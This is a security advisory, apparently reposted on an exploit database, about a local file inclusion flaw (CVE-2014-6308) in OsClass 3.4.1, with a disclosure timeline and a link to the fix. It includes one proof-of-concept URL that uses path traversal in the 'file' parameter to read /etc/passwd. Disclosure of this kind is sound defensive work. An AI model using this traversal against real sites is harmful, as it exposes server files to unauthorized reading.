OsClass 3.4.1 (index.php, file param) - Local File Inclusion Vulnerability

2014-09-25T00:00:00
ID 1337DAY-ID-22689
Type zdt
Reporter Netsparker
Modified 2014-09-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Information
-----------
Advisory by Netsparker.
Name : LFI Vulnerability in OsClass
Affected Software : OsClass
Affected Versions: 3.4.1 and possibly below
Vendor Homepage : http://osclass.org/
Vulnerability Type : Local File Inclusion
Severity : Critical
CVE-ID: CVE-2014-6308
Netsparker Advisory Reference : NS-14-031
 
Advisory URL
------------
https://www.netsparker.com/lfi-vulnerability-in-osclass/
 
Description
-----------
Local file inclusion vulnerability where discovered in Osclass, an
open source project that allows you to create a classifieds sites.
 
Technical Details
-----------------
Proof of Concept URL for LFI in OsClass:
 
http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
 
Advisory Timeline
-----------------
03/09/2014 - First Contact
03/09/2014 - Vulnerability fixed:
https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
15/09/2014 - Fix released publicly in Osclass 3.4.2
 
Credits & Authors
-----------------
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner.

#  0day.today [2018-03-20]  #